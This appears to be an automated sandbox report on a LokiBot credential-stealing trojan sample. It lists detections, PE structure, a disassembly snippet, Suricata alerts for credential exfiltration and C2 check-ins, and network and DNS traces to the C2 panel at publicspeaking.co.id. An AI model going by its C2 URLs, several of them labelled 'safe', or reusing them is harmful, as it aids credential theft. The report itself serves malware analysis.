                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync3
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      wi7zJOZT2r.exe100%ReversingLabsWin32.Trojan.LokiBot
                      wi7zJOZT2r.exe89%VirustotalBrowse
                      wi7zJOZT2r.exe100%AviraTR/Crypt.XPACK.Gen
                      wi7zJOZT2r.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      publicspeaking.co.id17%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                      http://alphastand.win/alien/fre.php0%URL Reputationsafe
                      http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                      http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                      http://alphastand.top/alien/fre.php0%URL Reputationsafe
                      http://www.ibsensoftware.com/0%URL Reputationsafe
                      http://www.ibsensoftware.com/0%URL Reputationsafe
                      https://publicspeaking.co.id/cjay/Panel/five/fre.php8100%Avira URL Cloudmalware
                      https://publicspeaking.co.id/cjay/Panel/five/fre.php100%Avira URL Cloudmalware
                      http://publicspeaking.co.id/cjay/Panel/five/fre.php100%Avira URL Cloudmalware
                      http://www.publicspeaking.co.id/cjay/Panel/five/fre.php100%Avira URL Cloudmalware
                      http://publicspeaking.co.id/cjay/Panel/five/fre.php10%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      publicspeaking.co.id
                      216.239.38.21
                      truefalseunknown
                      NameMaliciousAntivirus DetectionReputation
                      http://kbfvzoboss.bid/alien/fre.phptrue
                      • URL Reputation: safe
                      unknown
                      http://alphastand.win/alien/fre.phptrue
                      • URL Reputation: safe
                      unknown
                      http://publicspeaking.co.id/cjay/Panel/five/fre.phpfalse
                      • 10%, Virustotal, Browse
                      • Avira URL Cloud: malware
                      unknown
                      http://alphastand.trade/alien/fre.phptrue
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://alphastand.top/alien/fre.phptrue
                      • URL Reputation: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://publicspeaking.co.id/cjay/Panel/five/fre.phpwi7zJOZT2r.exefalse
                      • Avira URL Cloud: malware
                      unknown
                      https://publicspeaking.co.id/cjay/Panel/five/fre.php8wi7zJOZT2r.exe, 00000000.00000002.368819944.0000000002977000.00000004.00000020.00020000.00000000.sdmp, wi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.publicspeaking.co.id/cjay/Panel/five/fre.phpwi7zJOZT2r.exe, 00000000.00000002.368693831.000000000065A000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://www.ibsensoftware.com/wi7zJOZT2r.exefalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      216.239.38.21
                      publicspeaking.co.idUnited States
                      15169GOOGLEUSfalse
                      216.239.32.21
                      unknownUnited States
                      15169GOOGLEUSfalse
                      Joe Sandbox Version:38.0.0 Beryl
                      Analysis ID:1283498
                      Start date and time:2023-08-01 04:46:07 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 2m 49s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:1
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:wi7zJOZT2r.exe
                      Original Sample Name:3dc7d72c3b38ce465684f96faeaa0ce7.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@1/2@7/2
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 100% (good quality ratio 95.9%)
                      • Quality average: 77%
                      • Quality standard deviation: 28.6%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 35
                      • Number of non-executed functions: 5
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      04:47:04API Interceptor4x Sleep call for process: wi7zJOZT2r.exe modified
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Users\user\Desktop\wi7zJOZT2r.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:1
                      Process:C:\Users\user\Desktop\wi7zJOZT2r.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):46
                      Entropy (8bit):1.0424600748477153
                      Encrypted:false
                      SSDEEP:3:/lbON:u
                      MD5:89CA7E02D8B79ED50986F098D5686EC9
                      SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                      SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                      SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:........................................user.
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.0585127096924465
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:wi7zJOZT2r.exe
                      File size:106'496 bytes
                      MD5:3dc7d72c3b38ce465684f96faeaa0ce7
                      SHA1:491568fcf9f2e718d587621361b0e82b681c9b8d
                      SHA256:5388ab765bd614a7350d9ce7126afab89ca2e0b0e55d23e1cd43459cb9bc745d
                      SHA512:d7fb5bd29a2e0da7405c3890c62e830998e8db7328b908d673248643af96f73adc0c19523c317a454f6d689fcf7d5fd4bee093513ed8b8f1233ec3794565bdf6
                      SSDEEP:1536:czvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqEIzmd:nSHIG6mQwGmfOQd8YhY0/ExUG
                      TLSH:BFA31942B2A5C030F7B74DB2BB73A5B7857E7C332D22C84E9352459A14215E1EB7AB13
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...
                      Icon Hash:90cececece8e8eb0
                      Entrypoint:0x4139de
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:0239fd611af3d0e9b0c46c5837c80e09
                      Instruction
                      push ebp
                      mov ebp, esp
                      push ecx
                      and dword ptr [ebp-04h], 00000000h
                      lea eax, dword ptr [ebp-04h]
                      push esi
                      push edi
                      push eax
                      call 00007F73B53E3C59h
                      push eax
                      call 00007F73B53E3C36h
                      xor esi, esi
                      mov edi, eax
                      pop ecx
                      pop ecx
                      cmp dword ptr [ebp-04h], esi
                      jle 00007F73B53E3E16h
                      push 004188BCh
                      push dword ptr [edi+esi*4]
                      call 00007F73B53D62E5h
                      pop ecx
                      pop ecx
                      test eax, eax
                      je 00007F73B53E3DFDh
                      push 00002710h
                      call 00007F73B53D6B9Ah
                      pop ecx
                      inc esi
                      cmp esi, dword ptr [ebp-04h]
                      jl 00007F73B53E3DCEh
                      push 00000000h
                      call 00007F73B53E3C2Eh
                      push 00000000h
                      call 00007F73B53E3F42h
                      pop ecx
                      pop edi
                      xor eax, eax
                      pop esi
                      mov esp, ebp
                      pop ebp
                      retn 0010h
                      push ebp
                      mov ebp, esp
                      xor eax, eax
                      push eax
                      push eax
                      push E567384Dh
                      push eax
                      call 00007F73B53D3589h
                      push dword ptr [ebp+08h]
                      call eax
                      pop ebp
                      ret
                      push ebp
                      mov ebp, esp
                      push esi
                      mov esi, dword ptr [ebp+08h]
                      test esi, esi
                      je 00007F73B53E3E54h
                      push esi
                      call 00007F73B53D60B0h
                      pop ecx
                      test eax, eax
                      je 00007F73B53E3E49h
                      push esi
                      call 00007F73B53D40ECh
                      pop ecx
                      test eax, eax
                      je 00007F73B53E3E3Eh
                      mov eax, dword ptr [0049FDECh]
                      cmp dword ptr [ebp+10h], 00000000h
                      cmovne eax, dword ptr [ebp+10h]
                      push eax
                      push dword ptr [0049FDE8h]
                      call 00007F73B53D5AE4h
                      push dword ptr [ebp+0Ch]
                      push dword ptr [0049FDE8h]
                      call 00007F73B53D5AD6h
                      push 00000000h
                      push 00000000h
                      push esi
                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [ASM] VS2003 (.NET) build 3077
                      • [ASM] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [C++] VS2013 UPD5 build 40629
                      • [LNK] VS2013 UPD5 build 40629
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x18ed00x64.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x150000x5c.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x136f50x13800False0.5685096153846154data6.49204829439013IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x150000x40600x4200False0.3700284090909091DOS executable (COM)4.268966749321832IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x1a0000x85e240x200False0.130859375OpenPGP Public Key0.941116049548311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .x0xa00000x20000x2000False0.02001953125data0.2244612956123434IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      DLLImport
                      WS2_32.dllgetaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
                      KERNEL32.dllGetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
                      ole32.dllCoCreateInstance, CoInitialize, CoUninitialize
                      OLEAUT32.dllVariantInit, SysFreeString, SysAllocString
                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      192.168.2.3216.239.38.2149697802021641 08/01/23-04:47:03.589313TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969780192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149697802024317 08/01/23-04:47:03.589313TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969780192.168.2.3216.239.38.21
                      192.168.2.3216.239.32.2149702802825766 08/01/23-04:47:05.661750TCP2825766ETPRO TROJAN LokiBot Checkin M24970280192.168.2.3216.239.32.21
                      192.168.2.3216.239.38.2149697802024312 08/01/23-04:47:03.589313TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969780192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149699802825766 08/01/23-04:47:04.225849TCP2825766ETPRO TROJAN LokiBot Checkin M24969980192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149697802025381 08/01/23-04:47:03.589313TCP2025381ET TROJAN LokiBot Checkin4969780192.168.2.3216.239.38.21
                      192.168.2.3216.239.32.2149701802825766 08/01/23-04:47:04.869622TCP2825766ETPRO TROJAN LokiBot Checkin M24970180192.168.2.3216.239.32.21
                      192.168.2.3216.239.32.2149701802024318 08/01/23-04:47:04.869622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970180192.168.2.3216.239.32.21
                      192.168.2.3216.239.32.2149701802021641 08/01/23-04:47:04.869622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970180192.168.2.3216.239.32.21
                      192.168.2.3216.239.38.2149700802825766 08/01/23-04:47:04.525369TCP2825766ETPRO TROJAN LokiBot Checkin M24970080192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149699802024313 08/01/23-04:47:04.225849TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14969980192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149700802024318 08/01/23-04:47:04.525369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970080192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149698802024317 08/01/23-04:47:03.996311TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969880192.168.2.3216.239.38.21
                      192.168.2.3216.239.32.2149702802025381 08/01/23-04:47:05.661750TCP2025381ET TROJAN LokiBot Checkin4970280192.168.2.3216.239.32.21
                      192.168.2.3216.239.32.2149701802024313 08/01/23-04:47:04.869622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970180192.168.2.3216.239.32.21
                      192.168.2.3216.239.38.2149698802021641 08/01/23-04:47:03.996311TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969880192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149698802825766 08/01/23-04:47:03.996311TCP2825766ETPRO TROJAN LokiBot Checkin M24969880192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149699802025381 08/01/23-04:47:04.225849TCP2025381ET TROJAN LokiBot Checkin4969980192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149698802024312 08/01/23-04:47:03.996311TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969880192.168.2.3216.239.38.21
                      192.168.2.3216.239.32.2149701802025381 08/01/23-04:47:04.869622TCP2025381ET TROJAN LokiBot Checkin4970180192.168.2.3216.239.32.21
                      192.168.2.3216.239.38.2149699802024318 08/01/23-04:47:04.225849TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24969980192.168.2.3216.239.38.21
                      192.168.2.3216.239.32.2149702802024313 08/01/23-04:47:05.661750TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970280192.168.2.3216.239.32.21
                      192.168.2.3216.239.32.2149702802021641 08/01/23-04:47:05.661750TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970280192.168.2.3216.239.32.21
                      192.168.2.3216.239.38.2149700802024313 08/01/23-04:47:04.525369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970080192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149697802825766 08/01/23-04:47:03.589313TCP2825766ETPRO TROJAN LokiBot Checkin M24969780192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149699802021641 08/01/23-04:47:04.225849TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969980192.168.2.3216.239.38.21
                      192.168.2.3216.239.32.2149702802024318 08/01/23-04:47:05.661750TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970280192.168.2.3216.239.32.21
                      192.168.2.3216.239.38.2149700802021641 08/01/23-04:47:04.525369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970080192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149698802025381 08/01/23-04:47:03.996311TCP2025381ET TROJAN LokiBot Checkin4969880192.168.2.3216.239.38.21
                      192.168.2.3216.239.38.2149700802025381 08/01/23-04:47:04.525369TCP2025381ET TROJAN LokiBot Checkin4970080192.168.2.3216.239.38.21
                      TimestampSource PortDest PortSource IPDest IP
                      Aug 1, 2023 04:47:03.568627119 CEST4969780192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.583986044 CEST8049697216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:03.584297895 CEST4969780192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.589313030 CEST4969780192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.604464054 CEST8049697216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:03.604659081 CEST4969780192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.619658947 CEST8049697216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:03.685257912 CEST8049697216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:03.685352087 CEST8049697216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:03.685589075 CEST4969780192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.685652018 CEST4969780192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.700661898 CEST8049697216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:03.978554010 CEST4969880192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.993669987 CEST8049698216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:03.993837118 CEST4969880192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:03.996310949 CEST4969880192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.011255026 CEST8049698216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.011425972 CEST4969880192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.026386976 CEST8049698216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.040185928 CEST8049698216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.040244102 CEST8049698216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.040344954 CEST4969880192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.040489912 CEST4969880192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.055339098 CEST8049698216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.187382936 CEST4969980192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.210637093 CEST8049699216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.210772991 CEST4969980192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.225848913 CEST4969980192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.249619007 CEST8049699216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.249774933 CEST4969980192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.264486074 CEST8049699216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.278326988 CEST8049699216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.278386116 CEST8049699216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.278527975 CEST4969980192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.278604031 CEST4969980192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.293205976 CEST8049699216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.498852968 CEST4970080192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.522512913 CEST8049700216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.522819996 CEST4970080192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.525368929 CEST4970080192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.548949957 CEST8049700216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.549263000 CEST4970080192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.573092937 CEST8049700216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.586734056 CEST8049700216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.586822033 CEST8049700216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.586877108 CEST4970080192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.586877108 CEST4970080192.168.2.3216.239.38.21
                      Aug 1, 2023 04:47:04.610507965 CEST8049700216.239.38.21192.168.2.3
                      Aug 1, 2023 04:47:04.843168020 CEST4970180192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:04.866842985 CEST8049701216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:04.867111921 CEST4970180192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:04.869621992 CEST4970180192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:04.893163919 CEST8049701216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:04.893372059 CEST4970180192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:04.908437967 CEST8049701216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:04.969077110 CEST8049701216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:04.969125986 CEST8049701216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:04.969244957 CEST4970180192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:04.969460964 CEST4970180192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:04.984335899 CEST8049701216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:05.643455982 CEST4970280192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:05.658570051 CEST8049702216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:05.659156084 CEST4970280192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:05.661750078 CEST4970280192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:05.676728010 CEST8049702216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:05.676820993 CEST4970280192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:05.691808939 CEST8049702216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:05.705703974 CEST8049702216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:05.705758095 CEST8049702216.239.32.21192.168.2.3
                      Aug 1, 2023 04:47:05.705849886 CEST4970280192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:05.706306934 CEST4970280192.168.2.3216.239.32.21
                      Aug 1, 2023 04:47:05.729837894 CEST8049702216.239.32.21192.168.2.3
                      TimestampSource PortDest PortSource IPDest IP
                      Aug 1, 2023 04:47:03.526540041 CEST5799053192.168.2.38.8.8.8
                      Aug 1, 2023 04:47:03.555804014 CEST53579908.8.8.8192.168.2.3
                      Aug 1, 2023 04:47:03.920677900 CEST5238753192.168.2.38.8.8.8
                      Aug 1, 2023 04:47:03.976876974 CEST53523878.8.8.8192.168.2.3
                      Aug 1, 2023 04:47:04.155936956 CEST5692453192.168.2.38.8.8.8
                      Aug 1, 2023 04:47:04.184673071 CEST53569248.8.8.8192.168.2.3
                      Aug 1, 2023 04:47:04.482528925 CEST6062553192.168.2.38.8.8.8
                      Aug 1, 2023 04:47:04.497777939 CEST53606258.8.8.8192.168.2.3
                      Aug 1, 2023 04:47:04.796644926 CEST4930253192.168.2.38.8.8.8
                      Aug 1, 2023 04:47:04.841779947 CEST53493028.8.8.8192.168.2.3
                      Aug 1, 2023 04:47:05.286439896 CEST5397553192.168.2.38.8.8.8
                      Aug 1, 2023 04:47:05.642297983 CEST53539758.8.8.8192.168.2.3
                      Aug 1, 2023 04:47:05.947508097 CEST5113953192.168.2.38.8.8.8
                      Aug 1, 2023 04:47:06.153187037 CEST53511398.8.8.8192.168.2.3
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Aug 1, 2023 04:47:03.526540041 CEST192.168.2.38.8.8.80xbf7bStandard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.920677900 CEST192.168.2.38.8.8.80x32d0Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.155936956 CEST192.168.2.38.8.8.80xd25dStandard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.482528925 CEST192.168.2.38.8.8.80xd56aStandard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.796644926 CEST192.168.2.38.8.8.80xbee4Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:05.286439896 CEST192.168.2.38.8.8.80x1a3Standard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:05.947508097 CEST192.168.2.38.8.8.80x9e7eStandard query (0)publicspeaking.co.idA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Aug 1, 2023 04:47:03.555804014 CEST8.8.8.8192.168.2.30xbf7bNo error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.555804014 CEST8.8.8.8192.168.2.30xbf7bNo error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.555804014 CEST8.8.8.8192.168.2.30xbf7bNo error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.555804014 CEST8.8.8.8192.168.2.30xbf7bNo error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.976876974 CEST8.8.8.8192.168.2.30x32d0No error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.976876974 CEST8.8.8.8192.168.2.30x32d0No error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.976876974 CEST8.8.8.8192.168.2.30x32d0No error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:03.976876974 CEST8.8.8.8192.168.2.30x32d0No error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.184673071 CEST8.8.8.8192.168.2.30xd25dNo error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.184673071 CEST8.8.8.8192.168.2.30xd25dNo error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.184673071 CEST8.8.8.8192.168.2.30xd25dNo error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.184673071 CEST8.8.8.8192.168.2.30xd25dNo error (0)publicspeaking.co.id216.239.36.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.497777939 CEST8.8.8.8192.168.2.30xd56aNo error (0)publicspeaking.co.id216.239.38.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.497777939 CEST8.8.8.8192.168.2.30xd56aNo error (0)publicspeaking.co.id216.239.34.21A (IP address)IN (0x0001)false
                      Aug 1, 2023 04:47:04.497777939 CEST8.8.8.8192.168.2.30xd56aNo error (0)publicspeaking.co.id216.239.32.21A (IP address)IN (0x0001)false
